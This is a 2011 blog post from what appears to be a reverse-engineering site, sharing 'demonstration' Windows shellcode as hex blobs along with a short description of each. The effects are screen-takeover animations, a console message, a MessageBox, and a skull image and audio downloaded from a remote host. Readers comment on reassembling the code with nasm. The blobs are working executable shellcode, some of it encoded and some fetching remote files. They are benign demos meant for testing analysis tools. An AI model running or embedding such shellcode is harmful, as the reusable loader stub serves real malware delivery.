demo shellcodes


Author: David Zimmer
Date: 01.24.11 - 7:46pm



Here are some good demonstration shellcodes:

You can either grab the hexblob from below, or download the source/binary packages.
  • fire screen - drops an embedded com file and executes it, no download, takes over whole screen, have to ctrl alt delete it. fire.com author unknown. source

  • laughing skull w/audio - downloads 3 files (about 60k) one is a audio of a meniacial laugh, the other two are a basic animation sequence of a skull laughing. When run it will do the downloads, show the desktop, play the sound, and then play the animation by setting the images as the desktop wallpaper. Pretty funny effect. (pls change the urls if you use this) source

  • the matrix is watching - Allocates a console, then types a message to it at varying speeds to simulate urgency, displays some ascii art that matches theme of message and then closes. Matrix like theme..Ascii art is compressed with RtlCompressBuffer and decompressed at runtime. source

  • tubes - same as the fire screen, but this time a cool spiral tube animation source

  • dropz - same as the fire screen but with a neat water drop animation source

  • skull wallpaper - downloads a mean looking skull graphic and sets it as the desktop wallpaper source

  • MessageBox Shellcode - just displays a simple messagebox alert. Unencoded, hexedit to change message.


The fire shellcode i wanted for a loooong time..

Theses all uses the harmony api lookup method and hashs. Although some use a slightly modified version so that I could cache the function pointers instead of doing every lookup on demand. (some like the animation require a lot of repetitive calls in a time sensitive way)

You can just paste these into Shellcode 2 exe if you want an exe to click. If you need null free, slap your own encoder on these.

To bad all shellcode isnt of this nature.
  • fire shellcode: (no downloads)
     
    FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF3
    1C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C0
    744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C
    738E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B
    01D0894424245B5B61595A51FFE0585F5A8B12EB865D8D85BB0100005068F
    F0000006830F349E4FFD58D9DBB01000001D8682E636F6D8F006A008D85BB
    01000050682C5B06E2FFD589C668AC0000008D9D0F010000535068F65F8EE
    9FFD589F05068ACFF8DF5FFD56A018D85BB0100005068318B6F87FFD568D0
    0700006844F035E0FFD58D9DBB0100005368D72EDD13FFD56A0068F0B5A25
    6FFD5B013CD1033C0BFB001B9007DF3ABBAC803EE42FEC980FB3C730580C3
    04EB0880FF3C730380C7048AC3EE8AC7EE32C0EEE2E3B1C88106AC01E9628
    006AC01628116AE011936A1AE0133D2BB4001F7F38BF2FE8C707DE2DDBEF1
    02BFB17EB162BA3E018A9CC0FE8A44FF03D88A440103D88A84400103D8C1E
    B02881D46474A75E246464747E2D9BEB27EBFB201B97E3E5157F3A55E6800
    A007BF027D59F3A51E07B401CD16748CB80300CD10C3
    
  • the matrix is watching: (no downloads)
     
    EB0F5831C966B991038030CC40E0FAEB05E8ECFFFFFF302444CCCCCCAC45
    29FD1EA8479EFC479EC0479ED847BEE4C37B86EAFD33FD0C60F0ADB0CEE0
    EC0D03C1CD0B2E3C9E9B479EDC478EF0CD1C478CB4490CB885CD1C9C4784
    D44794ECCD1F2FF78547F847CD1AFD33FD0C600D03C1CD0BF42CB938CFB1
    34F7B1E8B92E944794E8CD1FAA47C0874794D0CD1F47C847CD1C4588E8E8
    9797AD96959E0F94939647DE274B91A480BBEACBA448CD2EBBA4F624EEBB
    A4883CF92CA43C796E9AA4BD910791A4512AB9153319454961CDCCCC3319
    45497DCDCCCC3319454979CDCCCC3319454975CDCCCC3319454971CDCCCC
    3319454909CDCCCC331945490DCDCCCC41511FCDCCCC9F331C335961CDCC
    CC417112CDCCCC725ACCCCCC4CF3CCB8874CF3C4B0D2414903CDCCCCA6CC
    9CA6CD9BA6CB33597DCDCCCC8B9A335975CDCCCC271474CCCCCCCC46CBF0
    CAB9C2A4C4CBCCCC335975CDCCCC8B2773415105CDCCCCCD0F46CF450A8B
    277C414903CDCCCC415157CECCCC414149CFCCCC9CA426CCCCCC9FA4AEDD
    CCCC9DA6CE335909CDCCCCA6C8A6CB335971CDCCCC417149CFCCCC414903
    CDCCCC47C4A6CC9C9D9BA6CB33597DCDCCCCA46CC3CCCC335975CDCCCCA6
    CC335979CDCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
    CCCCCCCCCCCC5AA89CF0CCCCCCCCCCB9BFA9BEFFFEE2A8A0A0CCC6C6C580
    A5BFB8A9A2ECB8A3ECA1A9ECBAA9BEB5ECAFADBEA9AAB9A0A0B5E0ECBBA9
    ECA8A3A2B8ECA4ADBAA9ECA1B9AFA4ECB8A5A1A9E2E2CEC6C59BA9ECA1B9
    BFB8ECA1A9A9B8ECAEA9AAA3BEA9ECB8A4A9B5ECAAA5A2A8E2E2C6C8C5BF
    A3A1A9A3A2A9ECA5BFECAFA3A1A5CACDC6C6C58489808083C6CFC585ECA8
    A3A2B8ECA7A2A3BBECA4A3BBECB5A3B9ECA7A2A3BBEC98BEA5A2A5B8B5E2
    E2AEB9B8ECBBA9ECBBA5A0A0ECAEA9ECBBADB8AFA4A5A2ABECB5A3B9E2E2
    E2C8C6C6CC2A7CD8C1C6CDDCECC7CCE2E0F70CEBEBF7F7E0E2CC8CCCD4FE
    E0CCCCE2EBC888C868C1C62DC504E0E0EBEBC5D2C9DACDAADBCC4CCC56C6
    92F7CE94E0F78CC68CCDDEE0CCCAE0EC8C8C50E0ECCCBFCDDFCCB1F7E2C5
    FC2FCD90CDE18C8C8CCCF5CCEECCFD06ECCFBDF7CEC18CF7CCCCC6AEF0EC
    ECC9D5CD47CC70CE5EE2E0F2E0CCE4CC8ACDCEC2FE48D48CF7334ED9CFCE
    C9864FD5CCD5C6804CDDCCBD0D4EC1E0E2ECECE04CCBCCCF30ECEB4BFE4C
    D4CCCDC081C9DF4DBBCBCFDCCDD449A8EBECE0E2F638F7EB43D5EC4CB5CC
    054DFECDC9F3CF4CCC44CD1B5DDACCFF4FDFEBEBC0F6F6CC4DCECDCCCC
    
  • laughing skull (3 downloads - 60k)
     
    EB0F5831C966B9DE028030CC40E0FAEB05E8ECFFFFFF302444CCCCCCAC45
    29FD1EA8479EFC479EC0479ED847BEE4C37B86EAFD33FD0C60F0ADB0CEE0
    EC0D03C1CD0B2E3C9E9B479EDC478EF0CD1C478CB4490CB885CD1C9C4784
    D44794ECCD1F2FF78547F847CD1AFD33FD0C600D03C1CD0BF42CB938CFB1
    34F7B1E8B92E944794E8CD1FAA47C0874794D0CD1F47C847CD1C4588E8E8
    9797AD96959E0F94939647DE274B91A6CCA43C796E9AA4883CF92CA4ACF2
    AE02A488C40FB5A4E83DC128A443050C16A480BBEACBA43ABAC39E331945
    0AA6E4A6CC331C4171F3CECCCC45CB450B45FB4F0BC8331945CB450A4149
    6ACECCCC9C331A41497CCECCCC9C331A414977CECCCC9C331A4F0BC84FF0
    E8CCB8CA331945CB273D4171F3CECCCC47F3A4CCCDCCCCA6CC33DB41510A
    CECCCC45CFA4CCCDCCCCA6CC33DB415106CECCCC45CFA4CCCDCCCCA6CC33
    DB415102CECCCC45CF41498FCECCCC41510ACECCCC47D7A6CCA6CCA4C8CD
    CCCC9F9CA6CC339BC44F34CCC34910CCCCCC4149AFCECCCC415106CECCCC
    47D7A6CCA6CCA4C8CDCCCC9F9CA6CC339BC44F34CCC34979CCCCCC414948
    CECCCC415102CECCCC47D7A6CCA6CCA4C8CDCCCC9F9CA6CC339BC44F34CC
    C34942CCCCCCA6CCA6CDA6CCA697339BC0A6CCA6CCA6CCA688339BC0A6CC
    A6CFA6CCA697339BC0A6CCA6CEA6CCA688339BC0414902CECCCC47CCA6CD
    9C339BDC72C8CCCCCC41490ACECCCC47CCA6CC9CA6CCA6D8339BD8824F32
    CCB8E8A4E0CDCCCC339BD4414906CECCCC47CCA6CC9CA6CCA6D8339BD8A4
    E0CDCCCC339BD42708A47CC8CCCC339BD4A6CCA6CCA6CCA6D8339BD8A6CC
    339BD0CCCCCCCCA4B8B8BCF6E3E3BFADA2A8BFBCBEA5B8A9E2AFA3A1E3BF
    A7B9A0A0E2AEA1BCCCA4B8B8BCF6E3E3BFADA2A8BFBCBEA5B8A9E2AFA3A1
    E3BFA7B9A0A0FEE2AEA1BCCCA4B8B8BCF6E3E3BFADA2A8BFBCBEA5B8A9E2
    AFA3A1E3A1A3A2BFB8A9BEE2BBADBACC9B85828181E2888080CCB9BFA9BE
    FFFEE2A8A0A0CCB9BEA0A1A3A2E2A8A0A0CCCCCCCCCCCCCCCCCCCCCCCCCC
    


  • tubes shellcode: (no downloads)
    FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF3
    1C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C0
    744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C
    738E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B
    01D0894424245B5B61595A51FFE0585F5A8B12EB865D8D85150200005068F
    F0000006830F349E4FFD58D9D1502000001D8682E636F6D8F0083C004C600
    006A008D851502000050682C5B06E2FFD589C668000100008D9D150100005
    35068F65F8EE9FFD589F05068ACFF8DF5FFD56A018D85150200005068318B
    6F87FFD568D00700006844F035E0FFD58D9D150200005368D72EDD13FFD56
    A0068F0B5A256FFD5B81300CD1033C9BAC8038AC1EE42B000EE8AC1D0E8EE
    8AC13C407202B03FEEE2E6B44AB740CD210F82CB008CC880C4108ED880C41
    08EC0B2DAEC240874FB06B83011B703CD10BEF701BF04782E0FB61CC1E303
    743103DDB108268A1743B508D0E2661BC0662502010201660105660185000
    283C704FECD75E681C7E003E2DA81C720E046EBC607B800006BC005050700
    2EA3880196C604FF33FF8A45010245FF02850001028500FFD0E8262A05730
    2B000AA0BFF75E41E061F6800A007BF200033F6B2C8B180F3A50FB61C0BDB
    740E8AC3045026884180F7DB2688418083C740FECA75E007B401CD160F844
    AFFB400CD16B80300CD10C32D64726F707A2D3E00
    
  • dropz shellcode: (no downloads)
    FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF31
    C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C074
    4A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C738
    E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B01D0
    894424245B5B61595A51FFE0585F5A8B12EB865D8D85150200005068FF0000
    006830F349E4FFD58D9D1502000001D8682E636F6D8F0083C004C600006A00
    8D851502000050682C5B06E2FFD589C668000100008D9D15010000535068F6
    5F8EE9FFD589F05068ACFF8DF5FFD56A018D85150200005068318B6F87FFD5
    68D00700006844F035E0FFD58D9D150200005368D72EDD13FFD56A0068F0B5
    A256FFD5B013CD106800A0078CC880C4108EE031C9BAC80389C8EE42D0F878
    07EEF6E0C1E806EEB000EE790828C8D0E8EED0E8EE89CB64881FE2DA89CB01
    C8D3C088C6C0FE0510F2641297FF00D0EA648817F6D7648817E2E2DBE3D9EE
    80C708BF0402D845F457BAB0FFBD60FFBEFC01DF44D6892CDF048914DF04B1
    02D9C3D9FBD9C2D8C9D9C4D8CBDEE9D9CBDECADECBDEC2D9CAE2E6D9C1DCC8
    D9C1DCC8DEC1D9FADEFBD9F3DE4CFCDF1CDE4CFCDF5C018B348D0000E02440
    B0FB740FC1E6028D0028E0B0F07904D1E6B0D06402000005474581FDA00075
    934283FA50758A5EBF0019B564F3A5B5C84EC03C02E2FAE46098480F8565FF
    B003CD102900C33C62617A65
    
  • skull wallpaper shellcode: (1 download 26k)
    FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF31C
    0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C0744A
    01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C738E07
    5F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B01D08944
    24245B5B61595A51FFE0585F5A8B12EB865D686F6E00006875726C6D8D04245
    0684C772607FFD58D85E30000008D9D020100006A006A00680401000053506A
    00688FC9C0DAFFD583F80075148D85020100006A00506A006A1468603E62CEF
    FD56A0068F0B5A256FFD50000687474703A2F2F73616E647370726974652E63
    6F6D2F736B756C6C2E626D7000
    
  • MessageBox Shellcode
    FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF31C
    0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C0744A
    01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C738E07
    5F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B01D08944
    24245B5B61595A51FFE0585F5A8B12EB865D8D85B500000050684C772607FFD
    58D85C00000006A006A00506A006845835607FFD56A0068F0B5A256FFD57573
    657233322E646C6C007368656C6C636F64652072616E2073756363657373667
    56C6C792100
    





Comments: (3)

On 01.09.12 - 12:59pm Chris wrote:
Hey man, I have been really interested in this lately (oh and good job) but I have a question that is starting to bug me. If I download the source files to the hexblobs/shellcode...how can I edit them and reconvert them into shellcode like you have. This is just so I can for example edit the message in the Matrix shellcode. Be really awesome if you could help. Peace.

On 01.09.12 - 1:31pm Dave wrote:
Hi,

You can edit the .asm source files in notepad and then reassemble with nasm.exe

nasm.exe -f bin -O3 -o output.sc source.asm

If the source you are reassembling has an xor encoder at the top of it you can just comment it out so you dont have to manually encode the shellcode after assembly.

Sorry I can not help more, the nasm manual is pretty good, and there is a large userbase to find help on forums or on google.

On 01.09.12 - 2:09pm Chris wrote:
Hi man, Thanks it worked. And keep up the awesome work with the blog ) Peace.

 
Leave Comment:
Name:
Email: (not shown)
Message: (Required)
 



Twitter
RSS

About Me
More Blogs
Main Site
Posts:
64bit IDA Plugins
Twitter Feed
anterior lines
misc news/updates
KANAL Mod
Decoders again
CDO.Message Breakpoints
SysAnalyzer Updates
SysAnalyzer and Site Updates
crazy decoder
ida js w/dbg
flash patching #2
JS Graphing
packet reassembly
Delphi IDA Plugin
scdbg IDA integration
API Hash Database
Winmerge plugin
IDACompare Updates
Guest Post @ hexblog
TCP Stream Reassembly
SysAnalyzer Updates
Apilogger Video
Shellcode2Exe trainer
scdbg updates
IDA Javascript w/IDE
Rop Analysis II
scdbg vrs ROP
flash patching
x64 Hooks
micro hook
jmp api+5 *2
SysAnalyzer Updates
InjDll runtime config
C# Asm/Dsm Library
Shellcode Hook Detection
Updates II
findDll
Java Hacking
Windows 8
Win7 x64
Graphing ideas
.Net Hacking
Old iDefense Releases
BootLoaders
hll shellcode
ActionScript Tips
-patch fu
scdbg ordinal lookup
scdbg -api mode
Peb Module Lists
scdbg vrs Process Injection
GetProcAddress Scanner
scdbg fopen mode
scdbg findsc mode
scdbg MemMonitor
demo shellcodes
scdbg download
api hashs redux
Api hash gen
Retro XSS Chat Codes
Exe as DLL
Olly Plugins
Debugging Explorer
Attach to hidden process
JS Refactoring
Asm and Shellcode in CSharp
Fancy Return Address
PDF Stream Dumper
Malcode Call API by Hash
WinDbg Cheat Sheet
GPG Automation